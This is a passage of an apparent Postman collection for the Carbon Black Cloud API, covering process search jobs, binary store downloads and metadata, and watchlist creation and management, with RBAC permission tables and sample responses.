id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#get-events-associated-with-a-given-process\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","events","{{cb_process_guid}}","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4b11c8c6-ca64-4e40-884d-4be7f14bfda4"},{"name":"⚠️ Start a Process Facet Job","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"7ed55de5-f1df-4749-be76-a6b13d1d20bc"}}],"id":"6a6549cc-da4c-4397-8b32-61a335b4306a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"(event_id:c06d23168e5a11ea9ea33516be44bafd)\"\n}","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/events/{{cb_process_guid}}/facet_jobs","description":"<p>Creates a process facet job. The results for the facet job may be requested using the job ID returned. This route will not request processes.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#get-events-associated-with-a-given-process\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","events","{{cb_process_guid}}","facet_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"6a6549cc-da4c-4397-8b32-61a335b4306a"},{"name":"⚠️ Get Process Facets","id":"f95abee3-2a2f-48aa-9308-27bac1b2db5e","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"javascript"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/events/{{cb_process_guid}}/facet_jobs/{job_id}/results?limit=","description":"<p>Retrieves the process facet results for a given job ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#get-process-facets\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","events","{{cb_process_guid}}","facet_jobs","{job_id}","results"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>Maximum number of facets per category (i.e Any Process Search Fields listed in terms.fields)</p>\n","type":"text/plain"},"key":"limit","value":""}],"variable":[]}},"response":[],"_postman_id":"f95abee3-2a2f-48aa-9308-27bac1b2db5e"},{"name":"⚠️ Start a Process Search Job","event":[{"listen":"test","script":{"exec":["pm.test(\"Automatically updated cb_job_id with result.\", function () {","    var data = pm.response.json();","","    pm.response.to.have.status(200);","    pm.environment.set(\"cb_job_id\", data.job_id);","});"],"type":"text/javascript","id":"2b83525d-6a64-4c19-a6b0-10a9a9a589a8"}}],"id":"b8d68846-41f4-41a1-bfc5-bd534789fde6","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"process_name:cmd.exe\",\n    \"time_range\": {\n        \"end\": \"2020-04-21T00:00:00Z\",\n        \"start\": \"2020-04-19T00:00:00Z\"\n    },\n    \"rows\": 10000,\n    \"fields\": [\n        \"*\",\n        \"document_guid\"\n    ],\n    \"sort\": [\n        {\n            \"field\": \"device_timestamp\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs","description":"<p>Creates a process search job. The results for the search job may be requested using the job ID returned. This route will not request facets.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><blockquote>\n<p><strong>Note:</strong> See the <a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-fields/#process-search-fields\">Process Search Fields</a> for details on how to populate the search query.</p>\n</blockquote>\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#start-a-process-search-job\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","search_jobs"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c300e292-dc72-4b4b-8a91-58de1682bfea","name":"Search for processes by device_id","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"device_id:{{cb_device_id}}\",\n    \"terms\": {\n        \"fields\": [\n            \"process_username\"\n        ],\n        \"rows\": 1\n    },\n    \"sort\": [\n        {\n            \"field\": \"device_timestamp\",\n            \"order\": \"asc\"\n        }\n    ],\n    \"start\": 0,\n    \"time_range\": {\n        \"end\": \"2020-04-20T18:34:04Z\",\n        \"start\": \"2020-04-19T18:34:04Z\"\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 Apr 2020 16:40:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"79907bf0-b323-434d-91b6-7dc91e2c8f71\"\n}"},{"id":"d511cccd-5451-46d4-9850-46f934cce071","name":"Get Network Processes","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"query\": \"(event_type:netconn)\",\n    \"time_range\": {\n        \"start\": \"2020-04-19T17:24:35-07:00\"\n    },\n    \"rows\": 10000,\n    \"fields\": [\n        \"*\",\n        \"document_guid\"\n    ],\n    \"sort\": [\n        {\n            \"field\": \"device_timestamp\",\n            \"order\": \"DESC\"\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Thu, 23 Apr 2020 00:29:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"49"},{"key":"Connection","value":"keep-alive"}],"cookie":[],"responseTime":null,"body":"{\n    \"job_id\": \"538d1137-642b-44b0-8c1f-a8c77d0662b6\"\n}"}],"_postman_id":"b8d68846-41f4-41a1-bfc5-bd534789fde6"},{"name":"⚠️ Get Process Search Results","id":"702596f4-73f3-4b7c-95a5-a204ccead07a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/search_jobs/{{cb_job_id}}/results","description":"<p>Retrieves the process search results for a given job ID. Results will be sorted based on the sort parameter used when starting the search.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>threathunter.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/process-search-v2/#get-process-search-results\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","search_jobs","{{cb_job_id}}","results"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>starting rows of events, used for pagination    </p>\n","type":"text/plain"},"key":"start","value":"0"},{"disabled":true,"description":{"content":"<p>number of events to get, used for pagination    </p>\n","type":"text/plain"},"key":"rows","value":"100"}],"variable":[]}},"response":[],"_postman_id":"702596f4-73f3-4b7c-95a5-a204ccead07a"}],"id":"4f6e7dba-003f-4b89-bc03-cee41a92e57b","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"1132e3ad-96d6-473e-8013-abaa7c2d96d9"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"29687f5c-6a11-42fe-96bd-3045bd617cae"}}],"_postman_id":"4f6e7dba-003f-4b89-bc03-cee41a92e57b","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Unified Binary Store","item":[{"name":"Download File","id":"ecc0a995-8887-445c-ac31-ff841d812558","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"sha256\": [\"{{sha256}}\"],\n    \"expiration_seconds\": 300\n}"},"url":"{{cb_url}}/ubs/v1/orgs/{{cb_org_key}}/file/_download","description":"<p>This API provides a means to download files. The files are able to be downloaded via AWS S3 pre-signed URLs. The URLs enables the client to perform a GET on the provided URLs and download the files. The links will automatically expire after one hour, unless a different expiration time is requested.</p>\n<p>CAUTION - Anyone who has these links will be able to download the files until the requested expiration time (default one hour after the request). Ensure that care is taken when utilizing this API.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>Ubs.org.file</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/universal-binary-store-api/#download\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["ubs","v1","orgs","{{cb_org_key}}","file","_download"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"ecc0a995-8887-445c-ac31-ff841d812558"},{"name":"Retrieve Metadata","id":"a7a1bcb7-f3c0-4980-9999-59304fa6e524","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/ubs/v1/orgs/{{cb_org_key}}/sha256/{{sha256}}/metadata","description":"<p>This data is specific to the binary and is not a function of organization data. Retrieve Metadata for a Binary This API returns all of the metadata for the specified binary identified by the SHA-256 hash.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>Ubs.org.sha256</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/universal-binary-store-api/#retrieve-metadata\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["ubs","v1","orgs","{{cb_org_key}}","sha256","{{sha256}}","metadata"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a7a1bcb7-f3c0-4980-9999-59304fa6e524"},{"name":"Device Summary","id":"c7dcdfcd-d9ae-42e1-864f-cd614c7884c3","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/ubs/v1/orgs/{{cb_org_key}}/sha256/{{sha256}}/summary/device","description":"<p>This API returns a summarized view of the device details. Use this API to get an overview of the devices that executed the file.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/universal-binary-store-api/#device\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["ubs","v1","orgs","{{cb_org_key}}","sha256","{{sha256}}","summary","device"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"c7dcdfcd-d9ae-42e1-864f-cd614c7884c3"},{"name":"Request Signature","id":"9fc6ea1f-91f7-4ae4-91c1-34a4e6f605ff","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/ubs/v1/orgs/{{cb_org_key}}/sha256/{{sha256}}/summary/signature?rows=","description":"<p>This API will return a summary of the observed digital signature results for a given SHA-256 hash. The digital signature information for a binary may vary from one machine to another based on a variety of factors, including the presence of an up-to-date signature catalog on the host, system clock variations, ability to reach OCSP servers, custom root trust anchors, and more. Therefore, the results are ordered by prevalence, such that the most observed signatures will be returned first. The number of results are configurable, up to a max of 100 entries. Digital signatures can be recorded in a separate file (known as a “catalog” file) or embedded inside of the binary itself (an “embedded” signature). This signature API will capture the results of the endpoint’s verification of the digital signature associated with a given SHA-256 hash, stating whether that signature validation was based on a catalog file or an embedded signature.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>Ubs.org.sha256</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/universal-binary-store-api/#request-3\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["ubs","v1","orgs","{{cb_org_key}}","sha256","{{sha256}}","summary","signature"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The number of results to return. The default is 5 and the max is 100.</p>\n","type":"text/plain"},"key":"rows","value":""}],"variable":[]}},"response":[],"_postman_id":"9fc6ea1f-91f7-4ae4-91c1-34a4e6f605ff"},{"name":"File Path Input","id":"8a4e5567-e9f9-4384-8015-813b06bad09a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/ubs/v1/orgs/{{cb_org_key}}/sha256/{{sha256}}/summary/file_path?rows=","description":"<p>This API will return a summary of the observed file paths. The results are ordered by prevalence, such that the most observed file path will be returned first. The number of results are configurable, up to a max of 100 entries.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>Ubs.org.sha256</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/universal-binary-store-api/#input\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["ubs","v1","orgs","{{cb_org_key}}","sha256","{{sha256}}","summary","file_path"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>The number of results to return. The default is 5 and the max is 100.</p>\n","type":"text/plain"},"key":"rows","value":""}],"variable":[]}},"response":[],"_postman_id":"8a4e5567-e9f9-4384-8015-813b06bad09a"}],"id":"b7387a13-6857-498c-9912-be782dddd4e8","_postman_id":"b7387a13-6857-498c-9912-be782dddd4e8","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Watchlist","item":[{"name":"Healthcheck","id":"8f4c00fb-dbc9-4721-babe-da21c5e8fd7b","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/healthcheck","description":"<p>Successful response indicates service reachability.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#healthcheck\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","healthcheck"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"8f4c00fb-dbc9-4721-babe-da21c5e8fd7b"},{"name":"Create New Watchlist","id":"3a1d9ffe-85c0-4ba6-acfc-4fe369f8bd23","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"name\": \"Known Malware\",\n\t\"description\": \"this is a test watchlist\",\n\t\"tags_enabled\": true,\n\t\"alerts_enabled\": true,\n    \"alert_classification_enabled\": true,\n\t\"classifier\": {\n\t\t\"key\": \"feed_id\",\n\t\t\"value\": \"{{cb_feed_id}}\"\n\t}\n}"},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists","description":"<p>Create a new report or classifier watchlist. Unique watchlist ID will be generated by the service. Request must specify <code>report</code> or <code>classifier</code> but not both.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/watchlist-api/#create-new-watchlist\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"8c0cf5bd-fd28-4a5d-a837-369ac6b987a9","name":"Subscribe to Feed","originalRequest":{"method":"POST","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n\t\"name\": \"Known Malware\",\n\t\"description\": \"this is a test watchlist\",\n\t\"tags_enabled\": true,\n\t\"alerts_enabled\": true,\n\t\"classifier\": {\n\t\t\"key\": \"feed_id\",\n\t\t\"value\": \"{{cb_feed_id}}\"\n\t}\n}"},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 29 May 2020 19:03:50 GMT"},{"key":"Content-Type","value":"application/json; charset=utf-8"},{"key":"Content-Length","value":"284"},{"key":"Connection","value":"keep-alive"},{"key":"Server","value":"Python/3.6 aiohttp/3.5.4"}],"cookie":[],"responseTime":null,"body":"{\n    \"name\": \"Known Malware\",\n    \"description\": \"this is a test watchlist\",\n    \"id\": \"8zvLorhjTwmlWTGaJfVz0w\",\n    \"tags_enabled\": true,\n    \"alerts_enabled\": true,\n    \"create_timestamp\": 1590779030,\n    \"last_update_timestamp\": 1590779030,\n    \"report_ids\": null,\n    \"classifier\": {\n        \"key\": \"feed_id\",\n        \"value\": \"p1l0lhWMTkCVaEIDWIWn3A\"\n    }\n}"}],"_postman_id":"3a1d9ffe-85c0-4ba6-acfc-4fe369f8bd23"},{"name":"Get All Watchlists","id":"19bedecf-60d0-428a-8b5a-c2587079a75c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json","type":"text"}],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists","description":"<p>Retrieve all watchlists owned by the caller.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-all-watchlists\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"19bedecf-60d0-428a-8b5a-c2587079a75c"},{"name":"Get Watchlist","id":"408b8411-6046-41ea-ba1b-19b779b3e880","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}","description":"<p>Retrieve watchlist with <code>watchlist_id</code>.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#get-watchlist\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"408b8411-6046-41ea-ba1b-19b779b3e880"},{"name":"Update Watchlist","id":"a9ef7aff-2892-443d-8acd-d77f739839c0","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"// use classifier or report, not both\n\n{\"classifier\": {\"name\": str*,\n \"classifier_key\": str*,\n \"classifier_value\": str*,\n \"description\": str,\n \"watchlist_id\": str,\n \"tags_enabled\": bool,\n \"alerts_enabled\": bool,\n \"alert_classification_enabled\": bool,\n \"create_timestamp\": int,\n \"last_update_timestamp\": int},\n \"report\": {\"name\": str*,\n \"report_ids\": [str]*,\n \"description\": str,\n \"watchlist_id\": str,\n \"tags_enabled\": bool,\n \"alerts_enabled\": bool,\n \"create_timestamp\": int,\n \"last_update_timestamp\": int}}"},"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}","description":"<p>Update watchlist with <code>watchlist_id</code>. This will update the tags and alert status as well as any reports or classifiers attached to the watchlist. If a field is missing or null (ie <code>tags_enabled</code>) that field will not be updated. Cannot update report watchlist with empty <code>report_ids</code> list.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/cb-threathunter/latest/watchlist-api/#update-watchlist\">See the Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["threathunter","watchlistmgr","v3","orgs","{{cb_org_key}}","watchlists","{{cb_watchlist_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a9ef7aff-2892-443d-8acd-d77f739839c0"},{"name":"Delete Watchlist","id":"d8e1599e-ab2c-453c-96e5-758c284963f5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/threathunter/watchlistmgr/v3/orgs/{{cb_org_key}}/watchlists/{{cb_watchlist_id}}","description":"<p>Remove watchlist with <code>watchlist_id</code>. Existing hits for this watchlist will remain in the system.</p>\n<hr />\n<p><a href=\"https://developer.carbonblack.com/reference/cb-threathunter/latest/watchlist-api/#delete-watchlist\">See the 